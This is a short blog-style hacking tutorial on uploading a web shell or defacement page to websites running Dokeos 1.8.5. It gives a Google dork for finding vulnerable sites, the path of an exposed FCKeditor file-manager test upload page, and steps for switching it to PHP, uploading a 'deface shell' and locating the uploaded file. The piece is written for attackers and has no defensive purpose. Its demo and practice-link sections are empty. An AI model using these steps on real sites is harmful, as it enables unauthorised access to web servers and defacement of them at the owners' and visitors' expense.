Hello Friends i have decided to put more tutorial on web vulnerabilities so thought of posting some cool upload shell and defacing web vulnerabilities.
web vulnerability and exploit
So lets get started...

Using this vulnerability hacker can upload shell or webpage without knowing user name or password.

To do this you need two things :


Google Dork : "Portail Dokeos 1.8.5"
(search for the string that is inside double quotes that we call a google dork)


Exploit : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

(Its usually a url that hacker put to run his shell/you can say here uploading webpage)

Things that you need to do

Goto : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
change asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here To view your uploaded file go here : http://websitename/patch/main/upload/your file here

Live Demo :

Output results :

More such url for practice:

Good Luck Hcakers Stay awake for many such tutorials :)

Post a Comment

Feel Free To Ask Your Query we Love To Answer